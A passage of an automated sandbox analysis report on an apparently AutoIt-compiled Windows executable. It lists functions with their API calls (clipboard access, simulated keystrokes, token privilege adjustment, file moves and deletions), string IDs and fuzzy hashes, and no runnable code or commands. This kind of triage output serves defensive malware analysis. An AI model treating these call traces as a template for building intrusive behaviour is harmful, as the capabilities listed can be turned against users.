                          • GetCurrentThreadId.KERNEL32 ref: 00B743C5
                          • GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 00B743D1
                          • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00B743E2
                          • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00B743EA
                          • AttachThreadInput.USER32(00000000,?,00000001), ref: 00B743F2
                          • SetForegroundWindow.USER32(000000FF), ref: 00B743F5
                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00B7440A
                          • keybd_event.USER32(00000012,00000000), ref: 00B74415
                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00B7441F
                          • keybd_event.USER32(00000012,00000000), ref: 00B74424
                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00B7442D
                          • keybd_event.USER32(00000012,00000000), ref: 00B74432
                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00B7443C
                          • keybd_event.USER32(00000012,00000000), ref: 00B74441
                          • SetForegroundWindow.USER32(000000FF), ref: 00B74444
                          • AttachThreadInput.USER32(000000FF,?,00000000), ref: 00B7446B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                          • String ID: Shell_TrayWnd
                          • API String ID: 4125248594-2988720461
                          • Opcode ID: f5f13de56b7f68a74aba4515f6d163ce77c1071386371a8a1821dabe8a11535a
                          • Instruction ID: e299e7f0d2d0608af4fe23cea99821dafcef33ee0540bb796d4cef2e506b2720
                          • Opcode Fuzzy Hash: f5f13de56b7f68a74aba4515f6d163ce77c1071386371a8a1821dabe8a11535a
                          • Instruction Fuzzy Hash: BB316971A40218BBEB216B719C49FBF7FACEB44B50F114056FA19A71E0DBB05D01EB60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B0BDF0 Relevance: 35.6, APIs: 12, Strings: 8, Instructions: 643COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00B0CAEE: _memmove.LIBCMT ref: 00B0CB2F
                          • GetCurrentDirectoryW.KERNEL32(00000104,?,?,00002000,?,00BC22E8,?,00000000,?,00B03E2E,?,00000000,?,00B9DBF0,00000000,?), ref: 00B0BE8B
                          • GetFullPathNameW.KERNEL32(?,00000104,?,?,?,00B03E2E,?,00000000,?,00B9DBF0,00000000,?,00000002), ref: 00B0BEA7
                          • __wsplitpath.LIBCMT ref: 00B0BF19
                            • Part of subcall function 00B2297D: __wsplitpath_helper.LIBCMT ref: 00B229BD
                          • _wcscpy.LIBCMT ref: 00B0BF31
                          • _wcscat.LIBCMT ref: 00B0BF46
                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00B0BF56
                          • _wcscpy.LIBCMT ref: 00B0C03E
                          • _wcscpy.LIBCMT ref: 00B0C1ED
                          • SetCurrentDirectoryW.KERNEL32 ref: 00B0C250
                            • Part of subcall function 00B2010A: std::exception::exception.LIBCMT ref: 00B2013E
                            • Part of subcall function 00B2010A: __CxxThrowException@8.LIBCMT ref: 00B20153
                            • Part of subcall function 00B0C320: _memmove.LIBCMT ref: 00B0C419
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: CurrentDirectory_wcscpy$_memmove$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_wcscatstd::exception::exception
                          • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string$_
                          • API String ID: 2542276039-689609797
                          • Opcode ID: 979717687cd865f5cec7f6c208d9b3ec4e407867fc80ff5ce49a77107f857ad5
                          • Instruction ID: 625c26093e08772098ec3534f8ddce6dfe3a39239eb0c79e41d1a2f12a9da907
                          • Opcode Fuzzy Hash: 979717687cd865f5cec7f6c208d9b3ec4e407867fc80ff5ce49a77107f857ad5
                          • Instruction Fuzzy Hash: AC42C4715083419FD710EF60C881BABBBE8EF94300F0449ADF59997292DB71EA49DB93
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B46B3F Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 164filestringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00B031B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 00B031DA
                            • Part of subcall function 00B47B9F: __wsplitpath.LIBCMT ref: 00B47BBC
                            • Part of subcall function 00B47B9F: __wsplitpath.LIBCMT ref: 00B47BCF
                            • Part of subcall function 00B47C0C: GetFileAttributesW.KERNEL32(?,00B46A7B), ref: 00B47C0D
                          • _wcscat.LIBCMT ref: 00B46B9D
                          • _wcscat.LIBCMT ref: 00B46BBB
                          • __wsplitpath.LIBCMT ref: 00B46BE2
                          • FindFirstFileW.KERNEL32(?,?), ref: 00B46BF8
                          • _wcscpy.LIBCMT ref: 00B46C57
                          • _wcscat.LIBCMT ref: 00B46C6A
                          • _wcscat.LIBCMT ref: 00B46C7D
                          • lstrcmpiW.KERNEL32(?,?), ref: 00B46CAB
                          • DeleteFileW.KERNEL32(?), ref: 00B46CBC
                          • MoveFileW.KERNEL32(?,?), ref: 00B46CDB
                          • MoveFileW.KERNEL32(?,?), ref: 00B46CEA
                          • CopyFileW.KERNEL32(?,?,00000000), ref: 00B46CFF
                          • DeleteFileW.KERNEL32(?), ref: 00B46D10
                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 00B46D37
                          • FindClose.KERNEL32(00000000), ref: 00B46D53
                          • FindClose.KERNEL32(00000000), ref: 00B46D61
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: File$Find_wcscat$__wsplitpath$CloseDeleteMove$AttributesCopyFirstFullNameNextPath_wcscpylstrcmpi
                          • String ID: \*.*
                          • API String ID: 1867810238-1173974218
                          • Opcode ID: bdfcf61e7b421ecf01b51afceb5f1fdcc76eeaf2ab4b3e13f101d1b6f8d995ae
                          • Instruction ID: ef871fb03224098317aa019a364171eb561e780c6dddfb210a909747d7aec177
                          • Opcode Fuzzy Hash: bdfcf61e7b421ecf01b51afceb5f1fdcc76eeaf2ab4b3e13f101d1b6f8d995ae
                          • Instruction Fuzzy Hash: 7A512072D04168AACB21EBA0DC85EEE77FCAF0A300F4445E6E549E3051DB349B89DF61
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B57099 Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON
                          Download Yara Rule
                          APIs
                          • OpenClipboard.USER32(00B9DBF0), ref: 00B570C3
                          • IsClipboardFormatAvailable.USER32(0000000D), ref: 00B570D1
                          • GetClipboardData.USER32(0000000D), ref: 00B570D9
                          • CloseClipboard.USER32 ref: 00B570E5
                          • GlobalFix.KERNEL32(00000000), ref: 00B57101
                          • CloseClipboard.USER32 ref: 00B5710B
                          • GlobalUnWire.KERNEL32(00000000), ref: 00B57120
                          • IsClipboardFormatAvailable.USER32(00000001), ref: 00B5712D
                          • GetClipboardData.USER32(00000001), ref: 00B57135
                          • GlobalFix.KERNEL32(00000000), ref: 00B57142
                          • GlobalUnWire.KERNEL32(00000000), ref: 00B57176
                          • CloseClipboard.USER32 ref: 00B57283
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Clipboard$Global$Close$AvailableDataFormatWire$Open
                          • String ID:
                          • API String ID: 941120096-0
                          • Opcode ID: 42fef9bba3e09053041e311bd617ae973712d63064998c5074f906325a31d5f0
                          • Instruction ID: d81bed240236462e047b8cc0f4edb85f8efcf4d932ffa6f4a6232107ab5bb732
                          • Opcode Fuzzy Hash: 42fef9bba3e09053041e311bd617ae973712d63064998c5074f906325a31d5f0
                          • Instruction Fuzzy Hash: A251A171348205ABD311FF64EC96F6E77E8AB44B11F00059AF946E71E1EF61D909CB22
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B3B9F1 Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 223COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00B3BEC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00B3BF0F
                            • Part of subcall function 00B3BEC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00B3BF3C
                            • Part of subcall function 00B3BEC3: GetLastError.KERNEL32 ref: 00B3BF49
                          • _memset.LIBCMT ref: 00B3BA34
                          • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00B3BA86
                          • CloseHandle.KERNEL32(?), ref: 00B3BA97
                          • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00B3BAAE
                          • GetProcessWindowStation.USER32 ref: 00B3BAC7
                          • SetProcessWindowStation.USER32(00000000), ref: 00B3BAD1
                          • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00B3BAEB
                            • Part of subcall function 00B3B8B0: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000), ref: 00B3B8C5
                            • Part of subcall function 00B3B8B0: CloseHandle.KERNEL32(?), ref: 00B3B8D7
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                          • String ID: $default$winsta0
                          • API String ID: 2063423040-1027155976
                          • Opcode ID: 5a2bc65a2de4ce3fa803a16f97423c56f9782fd6cc782628c75272956e00b7a2
                          • Instruction ID: e0be38423e0e80ad80136dccb44ab1955f2d02bd7f1be983f7a42360edf6eb08
                          • Opcode Fuzzy Hash: 5a2bc65a2de4ce3fa803a16f97423c56f9782fd6cc782628c75272956e00b7a2
                          • Instruction Fuzzy Hash: 4B816C7190020CAFDF219FA4DD45EEEBBB9EF08304F64459AFA14A61A5DB318E15DB20
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B4FDD2 Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 278timefileCOMMON
                          Download Yara Rule
                          APIs
                          • FindFirstFileW.KERNEL32(?,?), ref: 00B4FE03
                          • FindClose.KERNEL32(00000000), ref: 00B4FE57
                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00B4FE7C
                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00B4FE93
                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 00B4FEBA
                          • __swprintf.LIBCMT ref: 00B4FF06
                          • __swprintf.LIBCMT ref: 00B4FF3F
                            • Part of subcall function 00B0CAEE: _memmove.LIBCMT ref: 00B0CB2F
                          • __swprintf.LIBCMT ref: 00B4FF93
                            • Part of subcall function 00B2234B: __woutput_l.LIBCMT ref: 00B223A4
                          • __swprintf.LIBCMT ref: 00B4FFE1
                          • __swprintf.LIBCMT ref: 00B50030
                          • __swprintf.LIBCMT ref: 00B5007F
                          • __swprintf.LIBCMT ref: 00B500CE
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: __swprintf$FileTime$FindLocal$CloseFirstSystem__woutput_l_memmove
                          • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                          • API String ID: 108614129-2428617273
                          • Opcode ID: d8272fbafbde1a00dce93cb2c5513c41514ef4e54e0ed5313e2ba313b49162cd
                          • Instruction ID: 4a5d3f64fd9c191c6b79a1986b97cc0169665a72ef8e597255431d10739c3c93
                          • Opcode Fuzzy Hash: d8272fbafbde1a00dce93cb2c5513c41514ef4e54e0ed5313e2ba313b49162cd
                          • Instruction Fuzzy Hash: 6EA10FB2508344ABC710EFA4D885DAFB7EDAF98700F44099DF595C3191EB34EA49CB62
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B52044 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 118fileCOMMON
                          Download Yara Rule
                          APIs
                          • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00B52065
                          • _wcscmp.LIBCMT ref: 00B5207A
                          • _wcscmp.LIBCMT ref: 00B52091
                          • GetFileAttributesW.KERNEL32(?), ref: 00B520A3
                          • SetFileAttributesW.KERNEL32(?,?), ref: 00B520BD
                          • FindNextFileW.KERNEL32(00000000,?), ref: 00B520D5
                          • FindClose.KERNEL32(00000000), ref: 00B520E0
                          • FindFirstFileW.KERNEL32(*.*,?), ref: 00B520FC
                          • _wcscmp.LIBCMT ref: 00B52123
                          • _wcscmp.LIBCMT ref: 00B5213A
                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00B5214C
                          • SetCurrentDirectoryW.KERNEL32(00BB3A68), ref: 00B5216A
                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 00B52174
                          • FindClose.KERNEL32(00000000), ref: 00B52181
                          • FindClose.KERNEL32(00000000), ref: 00B52191
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                          • String ID: *.*
                          • API String ID: 1803514871-438819550
                          • Opcode ID: 06f5f63958aeda55c755c9336a6f8af406d262ae03e295a1aa31b3738f353022
                          • Instruction ID: cca7c4a01aba8109b02b2832d28ec73894bf3426bc3ac9753e9cb353ef32487f
                          • Opcode Fuzzy Hash: 06f5f63958aeda55c755c9336a6f8af406d262ae03e295a1aa31b3738f353022
                          • Instruction Fuzzy Hash: 4D319F32502619BADB14ABA4EC49BEE73ECDF06361F1440D6E915F30E0DA70DA89CB64
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B6F122 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 178windowfilenativeCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00B1AF7D: GetWindowLongW.USER32(?,000000EB), ref: 00B1AF8E
                          • DragQueryPoint.SHELL32(?,?), ref: 00B6F14B
                            • Part of subcall function 00B6D5EE: ClientToScreen.USER32(?,?), ref: 00B6D617
                            • Part of subcall function 00B6D5EE: GetWindowRect.USER32(?,?), ref: 00B6D68D
                            • Part of subcall function 00B6D5EE: PtInRect.USER32(?,?,00B6EB2C), ref: 00B6D69D
                          • SendMessageW.USER32(?,000000B0,?,?), ref: 00B6F1B4
                          • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00B6F1BF
                          • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00B6F1E2
                          • _wcscat.LIBCMT ref: 00B6F212
                          • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00B6F229
                          • SendMessageW.USER32(?,000000B0,?,?), ref: 00B6F242
                          • SendMessageW.USER32(?,000000B1,?,?), ref: 00B6F259
                          • SendMessageW.USER32(?,000000B1,?,?), ref: 00B6F27B
                          • DragFinish.SHELL32(?), ref: 00B6F282
                          • NtdllDialogWndProc_W.NTDLL(?,00000233,?,00000000,?,?,?), ref: 00B6F36D
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: MessageSend$Drag$Query$FileRectWindow$ClientDialogFinishLongNtdllPointProc_Screen_wcscat
                          • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                          • API String ID: 2166380349-3440237614
                          • Opcode ID: 4e699cb70c290e657b52a86f857381a4782b0f9c4585408827e752bb793216ba
                          • Instruction ID: fbf8a88d0f775d22d6cd127e2a624e216e9951b613bf059e73dbff8f3b81cd6a
                          • Opcode Fuzzy Hash: 4e699cb70c290e657b52a86f857381a4782b0f9c4585408827e752bb793216ba
                          • Instruction Fuzzy Hash: 23614A72508305AFC710EF64DC85EABBBE8FF89710F400A5EF595931A1DB709A45CB62
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B5219F Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 111fileCOMMON
                          Download Yara Rule
                          APIs
                          • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00B521C0
                          • _wcscmp.LIBCMT ref: 00B521D5
                          • _wcscmp.LIBCMT ref: 00B521EC
                            • Part of subcall function 00B47606: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00B47621
                          • FindNextFileW.KERNEL32(00000000,?), ref: 00B5221B
                          • FindClose.KERNEL32(00000000), ref: 00B52226
                          • FindFirstFileW.KERNEL32(*.*,?), ref: 00B52242
                          • _wcscmp.LIBCMT ref: 00B52269
                          • _wcscmp.LIBCMT ref: 00B52280
                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00B52292
                          • SetCurrentDirectoryW.KERNEL32(00BB3A68), ref: 00B522B0
                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 00B522BA
                          • FindClose.KERNEL32(00000000), ref: 00B522C7
                          • FindClose.KERNEL32(00000000), ref: 00B522D7
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                          • String ID: *.*
                          • API String ID: 1824444939-438819550
                          • Opcode ID: 13f4e11d29203d8a33750e2293bb83085c2331561088e9430a2eb73f2a91aa5d
                          • Instruction ID: 89cd6e80f13a8e6ef22db40d1ff6c23f17b0151c82031e8c6806a77db22a7c31
                          • Opcode Fuzzy Hash: 13f4e11d29203d8a33750e2293bb83085c2331561088e9430a2eb73f2a91aa5d
                          • Instruction Fuzzy Hash: 303191359062197ACB14ABA4EC48BEE77EC9F06321F1001D5E914B31A0DA71DA89CB64
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B06BBC Relevance: 21.9, APIs: 5, Strings: 7, Instructions: 891COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: _memmove_memset
                          • String ID: Q\E$[$\$\$\$]$^
                          • API String ID: 3555123492-286096704
                          • Opcode ID: 6909eb480159d669da440074fba562a30b6ae8bde3a9fd3199759f4c79942277
                          • Instruction ID: 0352acbe8abf313c43ac138ead9c2975725a759b649a354de62c98ee197b3d17
                          • Opcode Fuzzy Hash: 6909eb480159d669da440074fba562a30b6ae8bde3a9fd3199759f4c79942277
                          • Instruction Fuzzy Hash: 46729B71E14219CBDF28DF98C8806ADBBF1FF44314F2481E9D855AB291E734AE85DB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B2BDF6 Relevance: 21.5, APIs: 14, Instructions: 537COMMONLIBRARYCODE
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4915c77d0afae5b94e33fd0b8d652b154b68cfff31c35dfed21fd2b5d6af03e4
                          • Instruction ID: e27999ab9b635bb60cdfe1078b1ebbebed994285afcb4eb5a6c87b96036816ca
                          • Opcode Fuzzy Hash: 4915c77d0afae5b94e33fd0b8d652b154b68cfff31c35dfed21fd2b5d6af03e4
                          • Instruction Fuzzy Hash: 4E323E75A022688BDB249F54EC81AEDBBF5FB4A310F1441D9E40EE7A91D7709E80CF52
                          Uniqueness

                          Uniqueness Score: -1.00%

